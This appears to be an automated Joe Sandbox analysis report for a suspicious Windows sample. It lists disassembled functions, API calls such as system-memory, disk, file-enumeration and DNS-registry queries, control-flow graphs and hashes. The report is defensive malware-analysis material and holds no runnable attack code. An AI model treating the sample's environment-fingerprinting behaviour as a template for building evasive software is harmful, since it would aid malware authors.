                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                    • API String ID: 0-1590685507
                                                    • Opcode ID: 19108af69c7f17c244eb16a3deb158e24848971ec04407053b5d2e838519a11a
                                                    • Instruction ID: 17c2e77863d0b47943dbd7c11469d7ad8f38b1de58feb60113a2bd9717c21bcf
                                                    • Opcode Fuzzy Hash: 19108af69c7f17c244eb16a3deb158e24848971ec04407053b5d2e838519a11a
                                                    • Instruction Fuzzy Hash: CAC2B231A043449FDB14DF29C485B6AB7E1FF84314F09866DEC989B262D771ED84CBA1
                                                    Function 00D5255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE ref: 00D52579
                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 00D525CC
                                                    • GetDriveTypeA.KERNELBASE ref: 00D52647
                                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 00D5267E
                                                    • KiUserCallbackDispatcher.NTDLL ref: 00D527E2
                                                    • FindFirstFileW.KERNELBASE ref: 00D528F8
                                                    • FindNextFileW.KERNELBASE ref: 00D5291F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                    • String ID: @$`
                                                    • API String ID: 3271271169-3318628307
                                                    • Opcode ID: 800e393983531366a98d5529222f863bbcc2b09cdc9753647476d53b53ed7e71
                                                    • Instruction ID: 3b4f91e34b29aec4897057d38c0c9a2daa48797c2768502cc1735b651db18835
                                                    • Opcode Fuzzy Hash: 800e393983531366a98d5529222f863bbcc2b09cdc9753647476d53b53ed7e71
                                                    • Instruction Fuzzy Hash: 06D193B49153099FCB14EF68C5846AEBBF4FF88314F008969E898D7354E7349A88CF52
                                                    Function 00D529FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1272 d529ff-d52a2f FindFirstFileA 1273 d52a31-d52a36 1272->1273 1274 d52a38 1272->1274 1275 d52a3d-d52a91 call 1236090 call 1236120 RegOpenKeyExA 1273->1275 1274->1275 1280 d52a93-d52a98 1275->1280 1281 d52a9a 1275->1281 1282 d52a9f-d52b0c call 1236090 call 1236120 CharUpperA call 10d8da0 1280->1282 1281->1282 1290 d52b15 1282->1290 1291 d52b0e-d52b13 1282->1291 1292 d52b1a-d52b92 call 1236090 call 1236120 call 10d8e80 call 10d8e70 1290->1292 1291->1292 1301 d52b94-d52ba3 1292->1301 1302 d52bcc-d52c66 QueryFullProcessImageNameA CloseHandle call 10d8da0 1292->1302 1305 d52ba5-d52bae 1301->1305 1306 d52bb0-d52bca call 10d8e68 1301->1306 1312 d52c6f 1302->1312 1313 d52c68-d52c6d 1302->1313 1305->1302 1306->1301 1306->1302 1314 d52c74-d52ce9 call 1236090 call 1236120 call 10d8e80 call 10d8e70 1312->1314 1313->1314 1323 d52dcf-d52e1c call 1236090 call 1236120 CloseHandle 1314->1323 1324 d52cef-d52d49 call 10d8bb0 call 10d8da0 1314->1324 1333 d52e23-d52e2e 1323->1333 1337 d52d99-d52dad 1324->1337 1338 d52d4b-d52d63 call 10d8da0 1324->1338 1335 d52e37 1333->1335 1336 d52e30-d52e35 1333->1336 1340 d52e3c-d52ed6 call 1236090 call 1236120 1335->1340 1336->1340 1337->1323 1338->1337 1344 d52d65-d52d7d call 10d8da0 1338->1344 1354 d52ed8-d52ee1 1340->1354 1355 d52eea 1340->1355 1344->1337 1350 d52d7f-d52d97 call 10d8da0 1344->1350 1350->1337 1357 d52daf-d52dc9 call 10d8e68 1350->1357 1354->1355 1358 d52ee3-d52ee8 1354->1358 1356 d52eef-d52f16 call 1236090 call 1236120 1355->1356 1357->1323 1357->1324 1358->1356
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                    • String ID: 0
                                                    • API String ID: 2406880114-4108050209
                                                    • Opcode ID: 2b09a35e2e9afde7f41f0f3a2730e2de192732b4963c71e59ac50a6bf381fd8e
                                                    • Instruction ID: b9f80a90bc6343a04a8050a007ab35cce65cfac582683ca4ba286e1c8193a349
                                                    • Opcode Fuzzy Hash: 2b09a35e2e9afde7f41f0f3a2730e2de192732b4963c71e59ac50a6bf381fd8e
                                                    • Instruction Fuzzy Hash: E3E1D4B49043059FDB14EF68D9856ADBBF4BF94314F00886AE898D7354E7349A8CCF52
                                                    Function 00D605B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1546 d605b0-d605b7 1547 d607ee 1546->1547 1548 d605bd-d605d4 1546->1548 1549 d607e7-d607ed 1548->1549 1550 d605da-d605e6 1548->1550 1549->1547 1550->1549 1551 d605ec-d605f0 1550->1551 1552 d605f6-d60620 call d67350 call d570b0 1551->1552 1553 d607c7-d607cc 1551->1553 1558 d60622-d60624 1552->1558 1559 d6066a-d6068c call d8dec0 1552->1559 1553->1549 1560 d60630-d60655 call d570d0 call d603c0 call d67450 1558->1560 1565 d607d6-d607e3 call d67380 1559->1565 1566 d60692-d606a0 1559->1566 1586 d607ce 1560->1586 1587 d6065b-d60668 call d570e0 1560->1587 1565->1549 1569 d606f4-d606f6 1566->1569 1570 d606a2-d606a4 1566->1570 1573 d607ef-d6082b call d63000 1569->1573 1574 d606fc-d606fe 1569->1574 1571 d606b0-d606e4 call d673b0 1570->1571 1571->1565 1585 d606ea-d606ee 1571->1585 1590 d60831-d60837 1573->1590 1591 d60a2f-d60a35 1573->1591 1578 d6072c-d60754 1574->1578 1582 d60756-d6075b 1578->1582 1583 d6075f-d6078b 1578->1583 1588 d60707-d60719 WSAEventSelect 1582->1588 1589 d6075d 1582->1589 1601 d60700-d60703 1583->1601 1602 d60791-d60796 1583->1602 1585->1571 1595 d606f0 1585->1595 1586->1565 1587->1559 1587->1560 1588->1565 1599 d6071f 1588->1599 1600 d60723-d60726 1589->1600 1593 d60861-d6087e 1590->1593 1594 d60839-d60842 call d66fa0 1590->1594 1596 d60a37-d60a3a 1591->1596 1597 d60a3c-d60a52 1591->1597 1613 d60882-d6088d 1593->1613 1607 d60847-d6084c 1594->1607 1595->1569 1596->1597 1597->1565 1604 d60a58-d60a81 call d62f10 1597->1604 1599->1600 1600->1573 1600->1578 1601->1588 1602->1601 1606 d6079c-d607c2 call d576a0 1602->1606 1604->1565 1619 d60a87-d60a97 call d66df0 1604->1619 1606->1601 1611 d60852 1607->1611 1612 d60a9c-d60aa4 1607->1612 1611->1593 1616 d60854-d6085f 1611->1616 1612->1565 1617 d60893-d608b1 1613->1617 1618 d60970-d60975 1613->1618 1616->1613 1622 d608c8-d608f7 1617->1622 1620 d6097b-d60989 call d570b0 1618->1620 1621 d60a19-d60a2c 1618->1621 1619->1565 1620->1621 1629 d6098f-d6099e 1620->1629 1621->1591 1630 d608fd-d60925 1622->1630 1631 d608f9-d608fb 1622->1631 1633 d609b0-d609c1 call d570d0 1629->1633 1632 d60928-d6093f 1630->1632 1631->1632 1637 d60945-d6096b 1632->1637 1638 d608b3-d608c2 1632->1638 1639 d609c3-d609c7 1633->1639 1640 d609a0-d609ae call d570e0 1633->1640 1637->1638 1638->1618 1638->1622 1641 d609e8-d60a03 WSAEnumNetworkEvents 1639->1641 1640->1621 1640->1633 1643 d60a05-d60a17 1641->1643 1644 d609d0-d609e6 WSAEventSelect 1641->1644 1643->1644 1644->1640 1644->1641
                                                    APIs
                                                    • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00D60712
                                                    • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00D609DD
                                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00D609FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: EventSelect$EnumEventsNetwork
                                                    • String ID: multi.c
                                                    • API String ID: 2170980988-214371023
                                                    • Opcode ID: 90c13941d59778571583eecea9b57c2824ba028febecdd22cb0bed838b57efd0
                                                    • Instruction ID: baf3fefe1e7b5c1698c1ce9d0dbfc611bf77182882714e68d9a36d8628ee49d4
                                                    • Opcode Fuzzy Hash: 90c13941d59778571583eecea9b57c2824ba028febecdd22cb0bed838b57efd0
                                                    • Instruction Fuzzy Hash: 2DD1B1716083059FEB10DF64C881B6B7BE5FF94348F08482DF98597281E774E958DBA2
                                                    Function 00E1B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1771 e1b180-e1b195 1772 e1b3e0-e1b3e7 1771->1772 1773 e1b19b-e1b1a2 1771->1773 1774 e1b1b0-e1b1b9 1773->1774 1774->1774 1775 e1b1bb-e1b1bd 1774->1775 1775->1772 1776 e1b1c3-e1b1d0 1775->1776 1778 e1b1d6-e1b1f2 1776->1778 1779 e1b3db 1776->1779 1780 e1b229-e1b22d 1778->1780 1779->1772 1781 e1b233-e1b246 1780->1781 1782 e1b3e8-e1b417 1780->1782 1783 e1b260-e1b264 1781->1783 1784 e1b248-e1b24b 1781->1784 1789 e1b582-e1b589 1782->1789 1790 e1b41d-e1b429 1782->1790 1785 e1b269-e1b286 call e1af30 1783->1785 1786 e1b215-e1b223 1784->1786 1787 e1b24d-e1b256 1784->1787 1799 e1b2f0-e1b301 1785->1799 1800 e1b288-e1b2a3 call e1b060 1785->1800 1786->1780 1792 e1b315-e1b33c call 10d8b00 1786->1792 1787->1785 1793 e1b435-e1b44c call e1b590 1790->1793 1794 e1b42b-e1b433 call e1b590 1790->1794 1802 e1b342-e1b347 1792->1802 1803 e1b3bf-e1b3ca 1792->1803 1810 e1b458-e1b471 call e1b590 1793->1810 1811 e1b44e-e1b456 call e1b590 1793->1811 1794->1793 1799->1786 1820 e1b307-e1b310 1799->1820 1816 e1b200-e1b213 call e1b020 1800->1816 1817 e1b2a9-e1b2c7 getsockname call e1b020 1800->1817 1807 e1b384-e1b38f 1802->1807 1808 e1b349-e1b358 1802->1808 1812 e1b3cc-e1b3d9 1803->1812 1807->1803 1815 e1b391-e1b3a5 1807->1815 1814 e1b360-e1b382 1808->1814 1829 e1b473-e1b487 1810->1829 1830 e1b48c-e1b4a7 1810->1830 1811->1810 1812->1772 1814->1807 1814->1814 1821 e1b3b0-e1b3bd 1815->1821 1816->1786 1827 e1b2cc-e1b2dd 1817->1827 1820->1812 1821->1803 1821->1821 1827->1786 1831 e1b2e3 1827->1831 1829->1789 1832 e1b4b3-e1b4cb call e1b660 1830->1832 1833 e1b4a9-e1b4b1 call e1b660 1830->1833 1831->1820 1838 e1b4d9-e1b4f5 call e1b660 1832->1838 1839 e1b4cd-e1b4d5 call e1b660 1832->1839 1833->1832 1844 e1b4f7-e1b50b 1838->1844 1845 e1b50d-e1b52b call e1b770 * 2 1838->1845 1839->1838 1844->1789 1845->1789 1850 e1b52d-e1b531 1845->1850 1851 e1b580 1850->1851 1852 e1b533-e1b53b 1850->1852 1851->1789 1853 e1b578-e1b57e 1852->1853 1854 e1b53d-e1b547 1852->1854 1853->1789 1854->1853 1855 e1b549-e1b54d 1854->1855 1855->1853 1856 e1b54f-e1b558 1855->1856 1856->1853 1857 e1b55a-e1b576 call e1b870 * 2 1856->1857 1857->1789 1857->1853
                                                    APIs
                                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E1B2B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                                    • API String ID: 3358416759-2430778319
                                                    • Opcode ID: c8f540591f441832b128d69fb11aca16fc9e9343a001978091d4c5f8ee9a25ab
                                                    • Instruction ID: e2898d0d5c54dd1fb78a216f34463d396c3b9aaecd8047f23773ef8e01515563
                                                    • Opcode Fuzzy Hash: c8f540591f441832b128d69fb11aca16fc9e9343a001978091d4c5f8ee9a25ab
                                                    • Instruction Fuzzy Hash: 3CC181716043059FD718DF24C881AAA77E2FF88358F04996CF859AB3A1D774ED85CB81
                                                    Function 00D66FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83690a6be0f42feff916fcb494a957eeb6788ea030a6e8a6d4829145f96c8ef0
                                                    • Instruction ID: b74a2fe96464c364d2c6d4ef0168c53aae5d8bb4cf99cf4eeb5e5037c46c6b5e
                                                    • Opcode Fuzzy Hash: 83690a6be0f42feff916fcb494a957eeb6788ea030a6e8a6d4829145f96c8ef0
                                                    • Instruction Fuzzy Hash: 8B91F33060D34D4BD7358A29C8947BBB2E5EFD5328F189B2CE8A9432D4EB759C40D6A1
                                                    Function 00E1A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00E0712E,?,?,?,00001001,00000000), ref: 00E1A90C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: recvfrom
                                                    • String ID:
                                                    • API String ID: 846543921-0
                                                    • Opcode ID: 83d46bf298e3c7616b6d7e2826cfbb30d5e9b8d769ee415d6b9384d60492dc9e
                                                    • Instruction ID: bee55b5b30cd2e10252a2dd931760934d526062cc9f73f6e47961da4ca972687
                                                    • Opcode Fuzzy Hash: 83d46bf298e3c7616b6d7e2826cfbb30d5e9b8d769ee415d6b9384d60492dc9e
                                                    • Instruction Fuzzy Hash: 85F01D75109348AFD2209E41EC44DBBBBEDEFC9768F05456DF95823211D271AE50CAB2
                                                    Function 00E0A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E0AA19
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E0AA4C
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00E0AA97
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E0AAE9
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E0AB30
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E0AB6A
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E0AB82
                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00E0AC46
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E0AD0A
                                                    • RegEnumKeyExA.KERNELBASE ref: 00E0AD8D
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E0ADD9
                                                    • RegEnumKeyExA.KERNELBASE ref: 00E0AE08
                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E0AE2A
                                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E0AE54
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E0AF63
                                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E0AFB2
                                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E0B072
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
